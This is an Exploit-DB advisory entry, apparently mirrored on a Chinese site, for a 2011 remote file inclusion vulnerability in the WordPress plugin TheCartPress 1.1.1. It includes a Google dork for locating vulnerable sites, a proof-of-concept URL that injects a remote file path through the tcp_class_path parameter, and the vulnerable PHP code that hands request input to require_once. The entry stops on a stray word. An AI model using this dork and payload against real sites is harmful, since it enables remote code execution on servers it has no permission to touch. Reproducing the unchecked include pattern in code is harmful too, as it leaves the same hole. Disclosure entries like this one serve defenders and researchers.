WordPress Plugin TheCartPress 1.1.1 – Remote File Inclusion

  • 作者: Ben Schmidt
    日期: 2011-09-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17860/
  • # Exploit Title: Thecartpress WordPress plugin RFI
    # Google Dork: inurl:wp-content/plugins/thecartpress
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/thecartpress/download/
    # Version: 1.1.1 (tested)
    
    ---
    PoC
    ---
    http://SERVER/WP_PATH/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=RFI
    
    ---
    Vulnerable Code
    ---
    if ( isset( $_REQUEST['tcp_save_fields'] ) ) {
    	$path = $_REQUEST['tcp_class_path'];
    	$class_name = $_REQUEST['tcp_class_name'];
    	require_once( $path );
    
    Python